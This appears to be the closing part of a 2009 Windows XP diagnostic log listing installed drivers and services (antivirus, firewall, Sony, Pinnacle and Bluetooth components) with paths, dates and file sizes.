S3 alvoxvg6;alvoxvg6; C:\WINDOWS\system32\drivers\alvoxvg6.sys []
S3 Arp1394;1394 ARP ügyfélprotokoll; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-13 60800]
S3 BTHMODEM;Bluetooth-modem kommunikációs illesztőprogramja; C:\WINDOWS\system32\DRIVERS\bthmodem.sys [2008-04-13 37888]
S3 BTHPORT;Bluetooth-portillesztőprogram; C:\WINDOWS\System32\Drivers\BTHport.sys [2008-04-14 273408]
S3 CCDECODE;Feliratdekódoló; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2008-04-13 17024]
S3 FETNDIS;VIA PCI 10/100Mb Fast Ethernet adapter NT-illesztőprogramja; C:\WINDOWS\system32\DRIVERS\fetnd5.sys [2001-08-17 27165]
S3 ggflt;SEMC USB Flash Driver Filter; C:\WINDOWS\system32\DRIVERS\ggflt.sys [2009-03-01 13224]
S3 ggsemc;SEMC USB Flash Driver; C:\WINDOWS\system32\DRIVERS\ggsemc.sys [2009-03-01 24616]
S3 GT72NDISIPXP;GT 72 IP NDIS; C:\WINDOWS\system32\DRIVERS\Gt51Ip.sys [2007-07-09 95744]
S3 GT72UBUS;GT 72 U BUS; C:\WINDOWS\system32\DRIVERS\gt72ubus.sys [2007-06-26 51968]
S3 GTPTSER;GT PT SER; C:\WINDOWS\system32\DRIVERS\gtptser.sys [2007-03-30 8064]
S3 HidBth;Microsoft Bluetooth HID miniport; C:\WINDOWS\system32\DRIVERS\hidbth.sys [2008-04-14 25728]
S3 MSTEE;Microsoft Streaming Tee/Sink - Sink átalakító; C:\WINDOWS\system32\drivers\MSTEE.sys [2008-04-13 5504]
S3 NABTSFEC;NABTS/FEC VBI kodek; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2008-04-13 85248]
S3 NdisIP;Microsoft TV-/videokapcsolat; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2008-04-13 10880]
S3 NIC1394;1394 hálózati illesztőprogram; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-13 61824]
S3 se45bus;Sony Ericsson Device 069 driver (WDM); C:\WINDOWS\system32\DRIVERS\se45bus.sys [2006-11-30 61536]
S3 Ser2pl;Prolific Serial port driver; C:\WINDOWS\system32\DRIVERS\ser2pl.sys [2003-07-16 43264]
S3 SIS163u;SiS163 usb Wireless LAN Adapter Driver; C:\WINDOWS\system32\DRIVERS\sis163u.sys [2005-06-20 215040]
S3 SLIP;BDA Slip De-Framer; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2008-04-13 11136]
S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2008-04-13 15232]
S3 usbprint;Microsoft USB PRINTER osztály; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-13 25856]
S3 Wdf01000;Kernel Mode Driver Frameworks service; C:\WINDOWS\System32\Drivers\wdf01000.sys [2008-03-27 503008]
S3 WSTCODEC;World Standard Teletext kodek; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2008-04-13 19200]
S3 WudfPf;Windows Driver Foundation - User-mode Driver Framework Platform Driver; C:\WINDOWS\system32\DRIVERS\WudfPf.sys [2006-09-28 77568]
S3 WudfRd;Windows Driver Foundation - User-mode Driver Framework Reflector; C:\WINDOWS\system32\DRIVERS\wudfrd.sys [2006-09-28 82944]
S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 BthServ;Bluetooth Support Service; C:\WINDOWS\system32\svchost.exe [2008-04-14 14336]
R2 ekrn;Eset Service; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [2008-10-24 468224]
R2 GtDetectSc;GtDetectSc; C:\Program Files\T-Mobile\web'n'walk Manager\GtDetectSc.exe [2007-11-05 204915]
R2 InCDsrv;InCD Helper; C:\Program Files\Ahead\InCD\InCDsrv.exe [2004-02-10 847978]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2009-01-13 152984]
R2 KeyFocusWebServer;KF Web Server; C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe [2002-06-15 745472]
R2 NVSvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvsvc32.exe [2008-12-03 163908]
R2 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2006-03-03 69632]
R2 PnkBstrA;PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [2009-02-08 66872]
R2 TestHandler;Fujitsu Siemens Computers Diagnostic Testhandler; C:\Program Files\Fujitsu Siemens Computers\SystemDiagnostics\OnlineDiagnostic\TestManager\TestHandler.exe [2008-04-25 303104]
R2 UMWdf;Windows User Mode Driver Framework; C:\WINDOWS\system32\wdfmgr.exe [2005-01-28 38912]
R2 vsmon;TrueVector Internet Monitor; C:\WINDOWS\system32\ZoneLabs\vsmon.exe [2008-08-21 2405776]
R3 FontCache3.0.0.0;Windows Presentation Foundation Font Cache 3.0.0.0; c:\WINDOWS\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe [2006-10-20 36864]
R3 usnjsvc;Messenger megosztási mappák – USN-naplóolvasó szolgáltatás; C:\Program Files\Windows Live\Messenger\usnsvc.exe [2007-10-18 98328]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2005-09-23 29896]
S3 clr_optimization_v2.0.50727_32;.NET Runtime Optimization Service v2.0.50727_X86; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe [2005-09-23 66240]
S3 EhttpSrv;Eset HTTP Server; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [2008-10-24 19200]
S3 FLEXnet Licensing Service;FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [2009-05-19 655624]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [2005-11-14 69632]
S3 idsvc;Windows CardSpace; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe [2006-10-30 741376]
S3 MSCSPTISRV;MSCSPTISRV; C:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe [2006-12-14 45056]
S3 MSSQL$PINNACLESYS;MSSQL$PINNACLESYS; C:\Program Files\Pinnacle\MediaServer\Microsoft SQL Server\MSSQL$PINNACLESYS\Binn\sqlservr.exe [2005-05-04 9150464]
S3 MSSQLServerADHelper;MSSQLServerADHelper; C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqladhlp.exe [2005-05-03 73728]
S3 PACSPTISVR;PACSPTISVR; C:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe [2006-12-14 57344]
S3 PinnacleSys.MediaServer;Pinnacle Systems Media Service; C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSHost.exe [2006-01-19 49152]
S3 SerialKeys;SerialKeys; C:\WINDOWS\system32\skeys.exe [2008-04-14 26112]
S3 SonicStage Back-End Service;SonicStage Back-End Service; C:\Program Files\Common Files\Sony Shared\AVLib\SsBeSvc.exe [2007-02-05 112184]
S3 SPTISRV;Sony SPTI Service; C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe [2006-12-14 69632]
S3 SQLAgent$PINNACLESYS;SQLAgent$PINNACLESYS; C:\Program Files\Pinnacle\MediaServer\Microsoft SQL Server\MSSQL$PINNACLESYS\Binn\sqlagent.EXE [2005-05-03 323584]
S3 SSScsiSV;SonicStage SCSI Service; C:\Program Files\Common Files\Sony Shared\AVLib\SSScsiSV.exe [2007-02-05 75320]
S3 WLSetupSvc;Windows Live Setup Service; C:\Program Files\Windows Live\installer\WLSetupSvc.exe [2007-10-25 266240]
S3 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2008-04-14 14336]
S4 NetTcpPortSharing;Net.Tcp Port Sharing Service; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe [2006-10-30 122880]

-----------------EOF-----------------


Sat May 23, 2009 13:05